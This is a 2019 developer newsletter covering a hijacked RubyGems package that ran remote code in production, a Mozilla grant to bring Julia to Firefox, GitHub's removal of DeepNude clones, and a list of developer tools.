Jul 12, 2019 newsletter

Package hijacking spreads to the Ruby ecosystem as malicious code is inserted into compromised Ruby gem

RubyGems, a package manager for the Ruby programming language, was the latest platform to be targeted by package hijackers. An update to the RubyGems package strongpassword added a few lines of code that would check to see if the gem was running in production and, if so, fetch and run arbitrary code stored in a Pastebin post. The strongpassword package is a fairly popular gem, having been downloaded over 250,000 times in its lifetime. The malicious code was discovered by a developer who notified RubyGems after performing a security audit of his own application’s dependencies. The RubyGems team pulled the package version and locked the associated account. Later analysis revealed that the original developer of the package had his account credentials compromised, giving the hacker unrestricted access.

RubyGems is a package manager that provides a standard format for distributing Ruby libraries (called gems), a tool to install gems, and a service for hosting gems for the community at RubyGems.org. Similar to the npm registry and command line tool, RubyGems allows developers to extend the functionality of their code with a huge ecosystem of open source projects. Unlike RubyGems, however, npm is operated by a for-profit company that offers other services through its package registry.

RubyGems is another victim in a string of similar attacks. Over the past few months, the open source JavaScript community has been under increasing scrutiny after a number of high-profile issues with npm packages. Most recently, a hacker built a trustworthy npm package, only adding malicious code once the package was successfully deployed to an open source project to which the hacker had contributed. Ruby, unfortunately, will need to cope with similar vulnerabilities in its platform.

The pervasiveness and persistence of hijacking attacks proves that no developer ecosystem is entirely immune from such security concerns. Different package registries, however, are implementing different protective measures on different timelines, meaning developers will likely have to navigate a patchwork of trustworthiness across programming languages.


Mozilla announced that it’s funding a project to bring the Julia programming language to Firefox

The latest recipients of a Mozilla Research Grant are a team of developers and data scientists working to bring a Julia runtime to the web browser. The Julia programming language was created in 2009 by MIT researchers, publicly released in 2012, and has quickly climbed the ranks in popularity. Julia is in the top 50 programming languages according to the Tiobe index and was one of the fastest growing languages in 2018.

Julia was carefully designed to solve big data and analytics problems. Fast like Java and C++, Julia works well as a production-ready language, but also maintains the functionality of popular data science environments like R and Python. Julia joins C, C++, and Fortran as high-level languages that have achieved petaFLOPS computations (that’s at least one quadrillion operations per second).

Mozilla has an impressive history of attempting to port popular data science tools to the browser ecosystem. Earlier this year, as part of a larger effort known as Project Iodide to bring data science tools to the browser, the engineering team at Mozilla created a browser port of the Python interpreter using WebAssembly.

Browsers are rarely regarded as a useful data science tool or environment. Clunky web frameworks, unwieldy JavaScript, and browser limitations make scripting languages and simple IDEs especially attractive for data scientists. But as browsers grow more powerful and solidify their role as the new universal operating system, Mozilla is looking to strengthen its reputation as the most flexible, powerful, and extensible browser available to consumers and developers.


GitHub removes open source versions of DeepNude, a machine learning project that algorithmically removes clothing from images of women

DeepNude, a project that used neural networks to create realistic nude images of women, made headlines in the software development world over the last few weeks due to its controversial usage. DeepNude’s creator pulled the plug on the project, but open source versions of the codebase continued to appear on GitHub, uploaded by other users. GitHub is now removing these repositories in an attempt to stop the spread of tools similar to DeepNude.

Many developers often overlook the fact that GitHub, as the de facto home of open source software, still retains the right to moderate content that does not abide by its acceptable use policies. GitHub states “we do not proactively monitor user-generated content, but we do actively investigate abuse reports.” As Facebook, Twitter, and other technology giants come under fire for their handling of offensive and controversial content, growing scrutiny will likely make its way slowly into the developer world, particularly as open source software on public platforms continues to rapidly expand. GitHub may soon have to contend with the fact that controversial content and open source software could overlap more frequently in the future.


Small bytes


Tools

  • GIT.WTF is a curated list of tricky situations that you might find yourself in when using git with simple ways to get out peacefully [GIT.WTF]
  • p5.js is a client-side JS platform that empowers artists, designers, students, and anyone to learn to code and express themselves creatively on the web [P5.JS]
  • Frappe charts are GitHub-inspired simple and modern SVG charts for the web with zero dependencies [FRAPPE]
  • Notable is an open-source Markdown-based note-taking app that doesn’t suck [NOTABLE]
  • Awesome-indie is a repository of resources for independent developers to make money [GITHUB]
Never miss the big news

Every week, our team will send you three of the most important stories for developers, including our analysis of why they matter. Software development changes fast, but src is your secret weapon to stay up to date in the developer world.

Featured articles
AI Ethics: How Diverging Global Strategies Open a Gaping Regulatory Void

Today global initiatives on AI are a series of regulatory and ethical gambles—a dangerous, potentially existential game.


Can Master Chief win the day for Microsoft Azure?

Why the Xbox will be Azure’s unlikely hero.


Churn Baby, Churn

Understanding churn rates can help developers be more productive and write quality code

Made with by Software. Read more about our mission.